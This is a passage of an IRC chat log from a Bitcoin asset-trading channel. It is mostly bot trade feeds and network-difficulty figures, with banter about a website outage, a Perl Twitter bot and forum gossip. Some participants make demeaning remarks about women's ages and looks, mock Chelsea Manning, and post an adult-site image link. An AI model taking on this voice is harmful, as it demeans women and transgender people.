17:06:46 [BTCTC] [LABCOIN] 360 @ 0.00362 = 1.3032 BTC [+] Aug 29 17:06:47 [BTCTC] [LABCOIN] 362 @ 0.003621 = 1.3108 BTC [+] Aug 29 17:06:49 [BTCTC] [LABCOIN] 199 @ 0.003645 = 0.7254 BTC [+] Aug 29 17:08:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.0261 BTC [+] Aug 29 17:08:24 [BTCTC] [TAT.ASICMINER] 9 @ 0.02609 = 0.2348 BTC [-] Aug 29 17:08:53 [BTCTC] [BASIC-MINING] 2 @ 0.195 = 0.39 BTC [+] Aug 29 17:08:55 [BTCTC] [BASIC-MINING] 7 @ 0.1932 = 1.3524 BTC [-] Aug 29 17:10:11 [BTCTC] [TAT.ASICMINER] 15 @ 0.02609 = 0.3914 BTC [-] Aug 29 17:10:12 [BTCTC] [TAT.ASICMINER] 2 @ 0.02608 = 0.0522 BTC [-] Aug 29 17:10:14 [BTCTC] [TAT.ASICMINER] 30 @ 0.02603 = 0.7809 BTC [-] Aug 29 17:10:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.026 BTC [-] Aug 29 17:10:15 [BTCTC] [TAT.ASICMINER] 20 @ 0.026 = 0.52 BTC [-] Aug 29 17:10:16 [BTCTC] [TAT.ASICMINER] 10 @ 0.026 = 0.26 BTC [-] Aug 29 17:10:17 [BTCTC] [TAT.ASICMINER] 3 @ 0.026 = 0.078 BTC [-] Aug 29 17:10:31 [BTCTC] [LABCOIN] 1 @ 0.0036 BTC [-] Aug 29 17:10:33 [BTCTC] [LABCOIN] 1 @ 0.00355 BTC [-] Aug 29 17:11:37 [BTCTC] [LABCOIN] 140 @ 0.00368 = 0.5152 BTC [+] Aug 29 17:11:39 [BTCTC] [LABCOIN] 1 @ 0.003682 BTC [+] Aug 29 17:11:40 [BTCTC] [LABCOIN] 1000 @ 0.003682 = 3.682 BTC [+] Aug 29 17:11:41 [BTCTC] [LABCOIN] 100 @ 0.003692 = 0.3692 BTC [+] Aug 29 17:11:42 [BTCTC] [LABCOIN] 159 @ 0.003693 = 0.5872 BTC [+] Aug 29 17:11:49 [BTCTC] [ACTIVEMINING] 1087 @ 0.004553 = 4.9491 BTC [-] Aug 29 17:11:51 [BTCTC] [ACTIVEMINING] 5 @ 0.00455 = 0.0228 BTC [-] Aug 29 17:11:52 [BTCTC] [ACTIVEMINING] 200 @ 0.004506 = 0.9012 BTC [-] Aug 29 17:11:53 [BTCTC] [ACTIVEMINING] 300 @ 0.004503 = 1.3509 BTC [-] Aug 29 17:11:54 [BTCTC] [ACTIVEMINING] 2 @ 0.0045 = 0.009 BTC [-] Aug 29 17:11:56 [BTCTC] [ACTIVEMINING] 300 @ 0.004403 = 1.3209 BTC [-] Aug 29 17:11:57 [BTCTC] [ACTIVEMINING] 500 @ 0.004353 = 2.1765 BTC [-] Aug 29 17:11:58 [BTCTC] [ACTIVEMINING] 1750 @ 0.00435 = 7.6125 BTC [-] Aug 29 17:11:59 [BTCTC] [ACTIVEMINING] 120 @ 0.00433 = 0.5196 BTC [-] Aug 29 17:12:01 [BTCTC] [ACTIVEMINING] 508 @ 0.004329 = 2.1991 BTC [-] Aug 29 17:12:02 [BTCTC] [ACTIVEMINING] 350 @ 0.004304 = 1.5064 BTC [-] Aug 29 17:12:02 [BTCTC] [ACTIVEMINING] 250 @ 0.004302 = 1.0755 BTC [-] Aug 29 17:12:03 [BTCTC] [ACTIVEMINING] 1440 @ 0.004302 = 6.1949 BTC [-] Aug 29 17:12:04 [BTCTC] [ACTIVEMINING] 2000 @ 0.0043 = 8.6 BTC [-] Aug 29 17:12:05 [BTCTC] [ACTIVEMINING] 1 @ 0.0042 BTC [-] Aug 29 17:12:06 [BTCTC] [ACTIVEMINING] 1 @ 0.0042 BTC [-] Aug 29 17:12:07 [BTCTC] [ACTIVEMINING] 189 @ 0.0042 = 0.7938 BTC [-] Aug 29 17:12:08 [BTCTC] [ACTIVEMINING] 1000 @ 0.0042 = 4.2 BTC [-] Aug 29 17:12:09 [BTCTC] [ACTIVEMINING] 30 @ 0.00415 = 0.1245 BTC [-] Aug 29 17:12:10 [BTCTC] [ACTIVEMINING] 2000 @ 0.004142 = 8.284 BTC [-] Aug 29 17:12:10 Vrooom Aug 29 17:12:23 [MPEX] [S.MG] 10000 @ 0.00019 = 1.9 BTC [+] Aug 29 17:12:24 [MPEX] [S.MG] 3986 @ 0.00018001 = 0.7175 BTC [-] Aug 29 17:12:25 Well. I might just get to buy at a discount ON btct. Aug 29 17:12:27 Deal. Aug 29 17:12:28 [MPEX] [S.MG] 6700 @ 0.00018 = 1.206 BTC [-] Aug 29 17:12:35 [MPEX] [S.MG] 7314 @ 0.000171 = 1.2507 BTC [-] Aug 29 17:12:59 [BTCTC] [LABCOIN] 450 @ 0.003692 = 1.6614 BTC [-] Aug 29 17:14:09 [BTCTC] [BTC-GROWTH] 25 @ 0.101 = 2.525 BTC [+] Aug 29 17:14:34 [HAVELOCK] [AM100] 40 @ 0.026 = 1.04 BTC [+] Aug 29 17:15:04 [BTCTC] [TAT.MINIGAME] 100 @ 0.0002311 = 0.0231 BTC [+] Aug 29 17:15:07 [BTCTC] [TAT.MINIGAME] 42 @ 0.0002311 = 0.0097 BTC [+] Aug 29 17:15:09 [BTCTC] [TAT.MINIGAME] 406 @ 0.0002301 = 0.0934 BTC [-] Aug 29 17:15:10 [BTCTC] [TAT.MINIGAME] 10 @ 0.000228 = 0.0023 BTC [-] Aug 29 17:15:11 [BTCTC] [TAT.MINIGAME] 10 @ 0.000227 = 0.0023 BTC [-] Aug 29 17:15:12 [BTCTC] [TAT.MINIGAME] 200 @ 0.0002253 = 0.0451 BTC [-] Aug 29 17:15:13 [BTCTC] [TAT.MINIGAME] 45 @ 0.0002251 = 0.0101 BTC [-] Aug 29 17:15:14 [BTCTC] [TAT.MINIGAME] 1000 @ 0.000225 = 0.225 BTC [-] Aug 29 17:15:15 [BTCTC] [TAT.MINIGAME] 330 @ 0.000224 = 0.0739 BTC [-] Aug 29 17:15:17 [BTCTC] [TAT.MINIGAME] 100 @ 0.000223 = 0.0223 BTC [-] Aug 29 17:15:18 [BTCTC] [TAT.MINIGAME] 100 @ 0.000222 = 0.0222 BTC [-] Aug 29 17:15:19 [BTCTC] [TAT.MINIGAME] 197 @ 0.0002152 = 0.0424 BTC [-] Aug 29 17:15:20 [BTCTC] [TAT.MINIGAME] 1000 @ 0.0002151 = 0.2151 BTC [-] Aug 29 17:15:21 [BTCTC] [TAT.MINIGAME] 2809 @ 0.000215 = 0.6039 BTC [-] Aug 29 17:15:30 [HAVELOCK] [VTX] 1 @ 0.613 BTC [+] Aug 29 17:15:39 [BTCTC] [LABCOIN] 111 @ 0.00369 = 0.4096 BTC [-] Aug 29 17:16:30 [BTCTC] [LABCOIN] 400 @ 0.003692 = 1.4768 BTC [+] Aug 29 17:16:43 [BTCTC] [ACTIVEMINING] 40 @ 0.00416 = 0.1664 BTC [+] Aug 29 17:16:45 [BTCTC] [ACTIVEMINING] 50 @ 0.00415 = 0.2075 BTC [-] Aug 29 17:16:46 [BTCTC] [ACTIVEMINING] 100 @ 0.00413 = 0.413 BTC [-] Aug 29 17:16:47 [BTCTC] [ACTIVEMINING] 48 @ 0.004111 = 0.1973 BTC [-] Aug 29 17:16:48 [BTCTC] [ACTIVEMINING] 70 @ 0.004106 = 0.2874 BTC [-] Aug 29 17:16:50 [BTCTC] [ACTIVEMINING] 3610 @ 0.004105 = 14.8191 BTC [-] Aug 29 17:16:51 [BTCTC] [ACTIVEMINING] 100 @ 0.004101 = 0.4101 BTC [-] Aug 29 17:16:52 [BTCTC] [ACTIVEMINING] 22 @ 0.0041 = 0.0902 BTC [-] Aug 29 17:16:52 [BTCTC] [ACTIVEMINING] 100 @ 0.0041 = 0.41 BTC [-] Aug 29 17:16:53 [BTCTC] [ACTIVEMINING] 100 @ 0.0041 = 0.41 BTC [-] Aug 29 17:16:54 [BTCTC] [ACTIVEMINING] 250 @ 0.0041 = 1.025 BTC [-] Aug 29 17:16:56 [BTCTC] [ACTIVEMINING] 1360 @ 0.0041 = 5.576 BTC [-] Aug 29 17:16:57 [BTCTC] [ACTIVEMINING] 200 @ 0.004095 = 0.819 BTC [-] Aug 29 17:16:58 [BTCTC] [ACTIVEMINING] 350 @ 0.004011 = 1.4039 BTC [-] Aug 29 17:16:59 [BTCTC] [ACTIVEMINING] 1 @ 0.00401 BTC [-] Aug 29 17:17:00 [BTCTC] [ACTIVEMINING] 25 @ 0.00401 = 0.1003 BTC [-] Aug 29 17:17:01 [BTCTC] [ACTIVEMINING] 150 @ 0.004006 = 0.6009 BTC [-] Aug 29 17:17:02 [BTCTC] [ACTIVEMINING] 5000 @ 0.004005 = 20.025 BTC [-] Aug 29 17:17:04 [HAVELOCK] [XBOND] 100 @ 0.0012419 = 0.1242 BTC [-] Aug 29 17:18:45 [BTCTC] [ACTIVEMINING] 30 @ 0.004004 = 0.1201 BTC [-] Aug 29 17:19:12 [BTCTC] [ACTIVEMINING] 100 @ 0.004 = 0.4 BTC [-] Aug 29 17:19:14 [BTCTC] [ACTIVEMINING] 25 @ 0.004 = 0.1 BTC [-] Aug 29 17:19:15 [BTCTC] [ACTIVEMINING] 100 @ 0.004 = 0.4 BTC [-] Aug 29 17:19:16 [BTCTC] [ACTIVEMINING] 1200 @ 0.004 = 4.8 BTC [-] Aug 29 17:19:18 [BTCTC] [ACTIVEMINING] 2 @ 0.004 = 0.008 BTC [-] Aug 29 17:19:19 [BTCTC] [ACTIVEMINING] 70 @ 0.0039 = 0.273 BTC [-] Aug 29 17:19:20 [BTCTC] [ACTIVEMINING] 572 @ 0.003896 = 2.2285 BTC [-] Aug 29 17:19:21 [BTCTC] [ACTIVEMINING] 1000 @ 0.00385 = 3.85 BTC [-] Aug 29 17:19:22 [BTCTC] [ACTIVEMINING] 1000 @ 0.0038 = 3.8 BTC [-] Aug 29 17:19:22 [BTCTC] [ACTIVEMINING] 2500 @ 0.0038 = 9.5 BTC [-] Aug 29 17:19:29 [BTCTC] [ACTIVEMINING] 30 @ 0.004005 = 0.1202 BTC [+] Aug 29 17:19:59 [BTCTC] [TAT.ASICMINER] 68 @ 0.026 = 1.768 BTC [-] Aug 29 17:20:01 [HAVELOCK] [XBOND] 45 @ 0.0012419 = 0.0559 BTC [-] Aug 29 17:20:26 [HAVELOCK] [XBOND] 4 @ 0.0012419 = 0.005 BTC [-] Aug 29 17:20:57 [HAVELOCK] [AM100] 22 @ 0.026 = 0.572 BTC [+] Aug 29 17:23:48 [BTCTC] [ASICMINER-PT] 1 @ 2.723 BTC [+] Aug 29 17:24:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.02599 BTC [-] Aug 29 17:24:07 [BTCTC] [TAT.ASICMINER] 5 @ 0.02595 = 0.1298 BTC [-] Aug 29 17:24:08 [BTCTC] [TAT.ASICMINER] 1 @ 0.02581 BTC [-] Aug 29 17:24:09 [BTCTC] [TAT.ASICMINER] 8 @ 0.0258 = 0.2064 BTC [-] Aug 29 17:24:10 [BTCTC] [TAT.ASICMINER] 1 @ 0.0257 BTC [-] Aug 29 17:24:11 [BTCTC] [TAT.ASICMINER] 2 @ 0.02562 = 0.0512 BTC [-] Aug 29 17:24:12 [BTCTC] [TAT.ASICMINER] 1 @ 0.0256 BTC [-] Aug 29 17:24:13 [BTCTC] [TAT.ASICMINER] 7 @ 0.02558 = 0.1791 BTC [-] Aug 29 17:24:14 [BTCTC] [TAT.ASICMINER] 36 @ 0.02557 = 0.9205 BTC [-] Aug 29 17:24:15 [BTCTC] [TAT.ASICMINER] 2 @ 0.02556 = 0.0511 BTC [-] Aug 29 17:24:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.02556 BTC [-] Aug 29 17:24:30 [BTCTC] [LABCOIN] 200 @ 0.003513 = 0.7026 BTC [-] Aug 29 17:24:43 [BTCTC] [ASICMINER-PT] 1 @ 2.722 BTC [-] Aug 29 17:25:02 [BTCTC] [ASICMINER-PT] 2 @ 2.6 = 5.2 BTC [-] Aug 29 17:25:22 [BTCTC] [LABCOIN] 71 @ 0.003513 = 0.2494 BTC [-] Aug 29 17:25:24 [BTCTC] [LABCOIN] 33 @ 0.003513 = 0.1159 BTC [-] Aug 29 17:25:43 [BTCTC] [DMS.MINING] 6 @ 0.0036 = 0.0216 BTC [-] Aug 29 17:27:09 [BTCTC] [TAT.ASICMINER] 3 @ 0.02659 = 0.0798 BTC [+] Aug 29 17:27:23 [BTCTC] [BASIC-MINING] 4 @ 0.1997 = 0.7988 BTC [+] Aug 29 17:27:26 [BTCTC] [NASTY-PT] 1 @ 0.0027 BTC [+] Aug 29 17:27:28 [BTCTC] [NASTY-PT] 1 @ 0.002399 BTC [-] Aug 29 17:27:29 [BTCTC] [NASTY-PT] 5 @ 0.00235 = 0.0118 BTC [-] Aug 29 17:27:30 [BTCTC] [NASTY-PT] 206 @ 0.002301 = 0.474 BTC [-] Aug 29 17:27:38 [BTCTC] [TAT.VIRTUALMINE] 25 @ 0.0007579 = 0.0189 BTC [-] Aug 29 17:28:52 [BTCTC] [DMS.MINING] 6 @ 0.0036 = 0.0216 BTC [-] Aug 29 17:29:13 [BTCTC] [ASICMINER-PT] 1 @ 2.61 BTC [+] Aug 29 17:29:28 [BTCTC] [ACTIVEMINING] 3 @ 0.003999 = 0.012 BTC [-] Aug 29 17:30:19 [BTCTC] [ACTIVEMINING] 27 @ 0.003999 = 0.108 BTC [-] Aug 29 17:30:22 [BTCTC] [ACTIVEMINING] 3 @ 0.003999 = 0.012 BTC [-] Aug 29 17:31:23 [BTCTC] [ACTIVEMINING] 30 @ 0.004 = 0.12 BTC [+] Aug 29 17:37:39 [BTCTC] [LABCOIN] 62 @ 0.003524 = 0.2185 BTC [+] Aug 29 17:37:40 [BTCTC] [LABCOIN] 251 @ 0.003523 = 0.8843 BTC [-] Aug 29 17:37:42 [BTCTC] [LABCOIN] 104 @ 0.003521 = 0.3662 BTC [-] Aug 29 17:37:43 [BTCTC] [LABCOIN] 418 @ 0.00352 = 1.4714 BTC [-] Aug 29 17:37:44 [BTCTC] [LABCOIN] 518 @ 0.003513 = 1.8197 BTC [-] Aug 29 17:37:45 [BTCTC] [LABCOIN] 75 @ 0.003512 = 0.2634 BTC [-] Aug 29 17:37:45 [BTCTC] [LABCOIN] 2000 @ 0.00351 = 7.02 BTC [-] Aug 29 17:37:46 [BTCTC] [LABCOIN] 12 @ 0.003445 = 0.0413 BTC [-] Aug 29 17:37:48 [BTCTC] [LABCOIN] 50 @ 0.003444 = 0.1722 BTC [-] Aug 29 17:37:49 [BTCTC] [LABCOIN] 437 @ 0.003436 = 1.5015 BTC [-] Aug 29 17:37:50 [BTCTC] [LABCOIN] 1750 @ 0.003435 = 6.0113 BTC [-] Aug 29 17:37:51 [BTCTC] [LABCOIN] 75 @ 0.003411 = 0.2558 BTC [-] Aug 29 17:37:52 [BTCTC] [LABCOIN] 300 @ 0.00341 = 1.023 BTC [-] Aug 29 17:37:53 [BTCTC] [LABCOIN] 207 @ 0.003408 = 0.7055 BTC [-] Aug 29 17:41:17 [HAVELOCK] [AM100] 20 @ 0.025 = 0.5 BTC [-] Aug 29 17:41:38 [BTCTC] [TAT.ASICMINER] 17 @ 0.02556 = 0.4345 BTC [-] Aug 29 17:41:40 [BTCTC] [TAT.ASICMINER] 25 @ 0.02556 = 0.639 BTC [-] Aug 29 17:41:40 [BTCTC] [TAT.ASICMINER] 50 @ 0.02555 = 1.2775 BTC [-] Aug 29 17:41:41 [BTCTC] [TAT.ASICMINER] 15 @ 0.02553 = 0.383 BTC [-] Aug 29 17:41:43 [BTCTC] [TAT.ASICMINER] 20 @ 0.02553 = 0.5106 BTC [-] Aug 29 17:41:44 [BTCTC] [TAT.ASICMINER] 25 @ 0.02552 = 0.638 BTC [-] Aug 29 17:41:45 [BTCTC] [TAT.ASICMINER] 9 @ 0.02551 = 0.2296 BTC [-] Aug 29 17:41:46 [BTCTC] [TAT.ASICMINER] 6 @ 0.02551 = 0.1531 BTC [-] Aug 29 17:41:47 [BTCTC] [TAT.ASICMINER] 51 @ 0.0255 = 1.3005 BTC [-] Aug 29 17:41:48 [BTCTC] [TAT.ASICMINER] 63 @ 0.0255 = 1.6065 BTC [-] Aug 29 17:41:49 [BTCTC] [TAT.ASICMINER] 20 @ 0.0255 = 0.51 BTC [-] Aug 29 17:41:51 [BTCTC] [TAT.ASICMINER] 10 @ 0.0255 = 0.255 BTC [-] Aug 29 17:41:52 [BTCTC] [TAT.ASICMINER] 10 @ 0.0255 = 0.255 BTC [-] Aug 29 17:41:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.0254 BTC [-] Aug 29 17:41:53 [BTCTC] [TAT.ASICMINER] 10 @ 0.0254 = 0.254 BTC [-] Aug 29 17:41:54 [BTCTC] [TAT.ASICMINER] 78 @ 0.02521 = 1.9664 BTC [-] Aug 29 17:41:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.02521 BTC [-] Aug 29 17:41:56 [BTCTC] [TAT.ASICMINER] 436 @ 0.0252 = 10.9872 BTC [-] Aug 29 17:41:57 [BTCTC] [TAT.ASICMINER] 8 @ 0.0252 = 0.2016 BTC [-] Aug 29 17:41:59 [BTCTC] [TAT.ASICMINER] 300 @ 0.0251 = 7.53 BTC [-] Aug 29 17:42:00 [BTCTC] [TAT.ASICMINER] 5 @ 0.02505 = 0.1253 BTC [-] Aug 29 17:42:01 [BTCTC] [TAT.ASICMINER] 10 @ 0.02501 = 0.2501 BTC [-] Aug 29 17:42:02 [BTCTC] [TAT.ASICMINER] 5 @ 0.025 = 0.125 BTC [-] Aug 29 17:42:04 [BTCTC] [TAT.ASICMINER] 4 @ 0.025 = 0.1 BTC [-] Aug 29 17:42:04 [BTCTC] [TAT.ASICMINER] 600 @ 0.025 = 15 BTC [-] Aug 29 17:42:05 [BTCTC] [TAT.ASICMINER] 17 @ 0.025 = 0.425 BTC [-] Aug 29 17:42:06 [BTCTC] [TAT.ASICMINER] 22 @ 0.025 = 0.55 BTC [-] Aug 29 17:42:07 [BTCTC] [TAT.ASICMINER] 56 @ 0.025 = 1.4 BTC [-] Aug 29 17:42:08 [BTCTC] [TAT.ASICMINER] 30 @ 0.025 = 0.75 BTC [-] Aug 29 17:42:09 [BTCTC] [TAT.ASICMINER] 30 @ 0.025 = 0.75 BTC [-] Aug 29 17:49:20 [BTCTC] [ASICMINER-PT] 1 @ 2.599 BTC [-] Aug 29 17:49:21 [BTCTC] [ASICMINER-PT] 3 @ 2.6 = 7.8 BTC [+] Aug 29 17:50:31 [BTCTC] [LABCOIN] 1 @ 0.003555 BTC [+] Aug 29 17:51:02 [MPEX] [S.MPOE] 32550 @ 0.00087177 = 28.3761 BTC [+] Aug 29 17:51:03 [MPEX] [S.MPOE] 864 @ 0.00087421 = 0.7553 BTC [+] Aug 29 17:51:14 mircea_popescu hey this is unprecedented Aug 29 17:51:16 trilema is down Aug 29 17:51:23 but I guess you already know that Aug 29 17:52:46 [BTCTC] [LABCOIN] 1 @ 0.0035 BTC [-] Aug 29 17:53:28 say it aint so Aug 29 17:54:54 give it a try ThickAsThieves may just be from my location Aug 29 17:55:24 is down Aug 29 17:55:27 scroll up Aug 29 17:56:04 i see mod6 Aug 29 17:56:07 thanks for that Aug 29 17:56:08 mr. lurker Aug 29 17:56:13 [BTCTC] [ASICMINER-PT] 1 @ 2.584 BTC [-] Aug 29 17:56:19 [BTCTC] [LABCOIN] 102 @ 0.003497 = 0.3567 BTC [-] Aug 29 17:56:29 [BTCTC] [LABCOIN] 232 @ 0.00341 = 0.7911 BTC [-] Aug 29 17:56:31 [BTCTC] [LABCOIN] 1985 @ 0.003407 = 6.7629 BTC [-] Aug 29 17:56:32 [BTCTC] [LABCOIN] 632 @ 0.003401 = 2.1494 BTC [-] Aug 29 17:58:27 [BTCTC] [DMS.MINING] 4 @ 0.0036 = 0.0144 BTC [-] Aug 29 17:58:29 Reposting - Yifu:http://imgur.com/Tr8HVI6 Aug 29 17:58:52 lmao Aug 29 17:59:29 I'd like to thank ArcticWolf for the .gif idea. Also Yifu, for the fuckin' best quote I've read in a long time. Aug 29 18:00:22 [BTCTC] [COGNITIVE] 1 @ 0.3251 BTC [-] Aug 29 18:00:27 [BTCTC] [COGNITIVE] 1 @ 0.3251 BTC [-] Aug 29 18:00:53 thestringpuller: :D Aug 29 18:01:21 ive been in perl mod hell all night. Aug 29 18:01:55 [BTCTC] [DMS.SELLING] 500 @ 0.01258 = 6.29 BTC [+] Aug 29 18:02:22 thestringpuller lol it's in the log Aug 29 18:02:46 http://log.bitcoin-assets.com/#269652 Aug 29 18:02:54 #bitcoin-assets log Aug 29 18:03:12 [BTCTC] [COGNITIVE] 3 @ 0.325 = 0.975 BTC [-] Aug 29 18:03:25 lol @gif Aug 29 18:03:26 i added this part to the bot that /should/ tweet the MPEx part of assbots stream. But i keep hitting these snags with not found modules. mainly because the host it runs on doesn't allow me to run CPAN. So I have to drop everything in by hand lol. Aug 29 18:03:29 [BTCTC] [DMS.SELLING] 74 @ 0.01258 = 0.9309 BTC [+] Aug 29 18:04:01 i have a question Aug 29 18:04:09 why are you writing anything in perl? Aug 29 18:04:11 mod6 hopefully twitter doesn't go all bonkers again. Aug 29 18:04:44 well, i registered this app in their OAuth thing and have keys and everything. should be ok. Aug 29 18:04:45 you can only tween 400 things from client within an hour Aug 29 18:04:49 or it might be 200 Aug 29 18:04:57 tweet* Aug 29 18:04:59 or it might be "less than 200 but we won't twell you how many" Aug 29 18:05:06 ahh Aug 29 18:05:08 "and yes we advertise ourselves as this exact service" Aug 29 18:05:13 also can't tweet the same thing twice in a row Aug 29 18:05:26 they have API restrictions that refresh every hour Aug 29 18:05:30 to prevent le spammors Aug 29 18:05:31 pankkake i had added a random number at end for the case where people do one of thiose Aug 29 18:05:36 haha Aug 29 18:05:44 [BTCTC] [DMS.SELLING] 200 @ 0.01259 = 2.518 BTC [+] Aug 29 18:05:46 well, i miss the @MPEx1 feed, so i figure i'd play with my own. if i break the thing, whatever. Aug 29 18:05:51 well the alternative is missing trades. wtf am i to do. Aug 29 18:06:06 that was a pretty good idea. thought about re-adding it Aug 29 18:06:25 to the end of the tweets. we'll see how it goes. first i gotta get the damn PM problem wrapped. Aug 29 18:06:38 and thestringpuller: because its what i know. and i kinda hate python Aug 29 18:07:06 just as long as its not rubyjava Aug 29 18:07:27 [BTCTC] [TAT.ASICMINER] 2 @ 0.025 = 0.05 BTC [-] Aug 29 18:07:29 [BTCTC] [TAT.ASICMINER] 32 @ 0.025 = 0.8 BTC [-] Aug 29 18:07:30 [BTCTC] [TAT.ASICMINER] 20 @ 0.025 = 0.5 BTC [-] Aug 29 18:07:31 [BTCTC] [TAT.ASICMINER] 1 @ 0.025 BTC [-] Aug 29 18:07:33 [BTCTC] [TAT.ASICMINER] 37 @ 0.02488 = 0.9206 BTC [-] Aug 29 18:07:40 [BTCTC] [DMS.SELLING] 25 @ 0.01259 = 0.3148 BTC [+] Aug 29 18:08:09 eek yah. Aug 29 18:08:26 in other news : someone spent 1.3billion isk to buy 2 shares of 1Bitcoin, the eve corp Aug 29 18:08:50 they are backed by 100 s.mpoe shares each, and so do we have the first isk -> btc asset trade ? Aug 29 18:08:51 are you gonna give up bitcoin for Eve? Aug 29 18:09:03 i think they're just trying to protect from iskflation. Aug 29 18:09:28 ;;nethash Aug 29 18:09:28 593536.083496 Aug 29 18:09:34 ;;bcstats Aug 29 18:09:37 Current Blocks: 254870 | Current Difficulty: 6.5750060149084814E7 | Next Difficulty At Block: 256031 | Next Difficulty In: 1161 blocks | Next Difficulty In About: 5 days, 21 hours, 26 minutes, and 29 seconds | Next Difficulty Estimate: 77441634.6326 | Estimated Percent Change: 17.78185 Aug 29 18:09:41 ;;estimate Aug 29 18:09:42 Next difficulty estimate | 77441634.6326 based on data since last change | 82914767.813 based on data for last three days Aug 29 18:09:52 ThickAsThieves and no im not gonna give up bitcoin wtf nonsense is that. Aug 29 18:10:00 phew Aug 29 18:10:18 :) Aug 29 18:10:21 heheh Aug 29 18:10:38 .d Aug 29 18:10:38 65750060.14908 | Next Diff in 1161 blocks | Estimated Change: 17.4921% in 6d 15h 37m 13s Aug 29 18:10:40 lol Aug 29 18:10:55 LOL it jumped 5% overnight? Aug 29 18:11:13 mircea_popescu: java rules... Aug 29 18:11:42 [BTCTC] [DMS.MINING] 9 @ 0.0036 = 0.0324 BTC [-] Aug 29 18:11:51 thestringpuller bitfury deliveries!~ Aug 29 18:11:59 daybyter ya it rules a dedicated circle in hell. Aug 29 18:12:29 I wanna read your asicminer article Aug 29 18:12:45 see ? you didn;'t read it five times each day, now SUFFAR! Aug 29 18:13:04 that's something the girl would say Aug 29 18:13:06 Hello girl Aug 29 18:13:08 lol Aug 29 18:13:26 you could have handwritten it on waistbands and daisy petals Aug 29 18:13:35 to have in a dark time such as this Aug 29 18:14:30 doesn't that violate the paywall? Aug 29 18:14:34 printing out trilema articles? Aug 29 18:15:05 I might as well print out best of trilema, and sell it at the n00b conventions :P Aug 29 18:15:08 [HAVELOCK] [CFIG] 1 @ 0.17000001 BTC [-] Aug 29 18:15:10 [HAVELOCK] [CFIG] 1 @ 0.17000001 BTC [-] Aug 29 18:15:20 what is the difference between a trilema and a dilema? Aug 29 18:15:20 lol Aug 29 18:15:23 [HAVELOCK] [CFIG] 6 @ 0.17 = 1.02 BTC [-] Aug 29 18:15:31 gecko_x2 trilema has 50% moar. Aug 29 18:15:34 [HAVELOCK] [CFIG] 8 @ 0.16 = 1.28 BTC [-] Aug 29 18:15:53 a dilema is a normal gun duel Aug 29 18:15:57 don't you mean 33.33%? Aug 29 18:15:57 a trilema is a mexican stand off Aug 29 18:16:02 i don't, no. Aug 29 18:16:06 ok Aug 29 18:16:07 ;;google mexican standoff Aug 29 18:16:08 Mexican standoff - Wikipedia, the free encyclopedia: ; Urban Dictionary: mexican standoff: ; Mexican standoff - Wiktionary: Aug 29 18:16:09 copy that. Aug 29 18:16:45 so uh, is the girl real? Aug 29 18:16:56 this is like a meme now Aug 29 18:16:59 i will be getting this in like 2018 too won't i Aug 29 18:17:15 she'll be all old and shrively by then and live entirely off the fame Aug 29 18:17:22 in 2018? Aug 29 18:17:26 is like 50 now? Aug 29 18:17:45 [HAVELOCK] [XBOND] 5 @ 0.00124189 = 0.0062 BTC [-] Aug 29 18:17:54 you can tell me Aug 29 18:18:16 i'm good either way, not judging Aug 29 18:18:50 well these days girls age fast. Aug 29 18:18:56 30+ one's like a ruin. Aug 29 18:19:41 you're not like having a chelsea manning moment or something are you? Aug 29 18:20:23 mircea_popescu: are you kidding? I would tap a 35 year old over a 20 year old any day of the week. Aug 29 18:20:29 dude, it's a sad statement on the castration level in the west that people think someone's going transsexual is about as likely as a female existing. Aug 29 18:20:42 thestringpuller yeah i'm kidding Aug 29 18:20:48 just asking Aug 29 18:21:04 VanCleef yes, yes, the girl is real. Aug 29 18:21:37 Chelsea Elizabeth Manning (born Bradley Edward Manning, December 17, 1987) dude... lmao. Aug 29 18:22:35 i thought maybe it was like an inside joke like amethyst Aug 29 18:22:54 it is an inside joke like amethyst, but the other way around Aug 29 18:23:01 (ie, forum ppls keep assuming she's me) Aug 29 18:23:21 they keep asuming scams are real and reality fake. it's a disease. Aug 29 18:23:24 the funny thing mircea_popescu is people believe you exists on the forums, even though you never post there Aug 29 18:23:40 but because the girl doesn't get on IRC and only exists on the forums she's "not real" Aug 29 18:23:45 oh and that she's a girl Aug 29 18:24:11 actually i saw some theorizing that it's really a girl all along, and i'm just the fake irc personality thereof. Aug 29 18:24:26 i'm thinking about doing a ipo to raise funds to install female toilets at bitcoin conventions, really good investment Aug 29 18:24:44 cause you could return them untouched after the convention for 100% money back ? Aug 29 18:24:53 pay per view VanCleef ? Aug 29 18:24:57 lol Aug 29 18:25:07 what a waste heh Aug 29 18:25:11 it should be pay per gram. Aug 29 18:25:31 im not paying to watch 200lbs violently & odorously expell a small child in a brown color scheme Aug 29 18:25:38 lol Aug 29 18:25:50 now I can't finish my breakfast Aug 29 18:25:53 yw. Aug 29 18:26:07 oh jesus Aug 29 18:26:18 [BTCTC] [DMS.MINING] 28 @ 0.0036 = 0.1008 BTC [-] Aug 29 18:26:20 i'm still laughing Aug 29 18:26:27 classic line Aug 29 18:27:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.025 BTC [+] Aug 29 18:27:12 [BTCTC] [TAT.ASICMINER] 3 @ 0.025 = 0.075 BTC [+] Aug 29 18:27:14 [BTCTC] [TAT.ASICMINER] 50 @ 0.025 = 1.25 BTC [+] Aug 29 18:27:37 are you implying you would take it if it was free Aug 29 18:27:51 unintentionally. Aug 29 18:29:01 [BTCTC] [TAT.ASICMINER] 68 @ 0.02499 = 1.6993 BTC [-] Aug 29 18:29:36 http://girls.twistys.com/preview/totm/09-2013/p01/image/12.jpg there. fake tits and dry lips to forget all about it. Aug 29 18:30:06 heh looks a lil like denise richards Aug 29 18:30:11 [BTCTC] [TAT.ASICMINER] 22 @ 0.02499 = 0.5498 BTC [-] Aug 29 18:30:12 [BTCTC] [LABCOIN] 350 @ 0.00354 = 1.239 BTC [+] Aug 29 18:30:14 [BTCTC] [TAT.ASICMINER] 10 @ 0.025 = 0.25 BTC [+] Aug 29 18:30:16 [BTCTC] [TAT.ASICMINER] 24 @ 0.025 = 0.6 BTC [+] Aug 29 18:30:30 actually it's nicole aniston. Aug 29 18:30:40 [HAVELOCK] [XBOND] 1 @ 0.0012 BTC [-] Aug 29 18:30:48 [BTCTC] [ASICMINER-PT] 1 @ 2.6 BTC [+] Aug 29 18:30:52 she's like 25, looks 40 Aug 29 18:32:14 [HAVELOCK] [XBOND] 1 @ 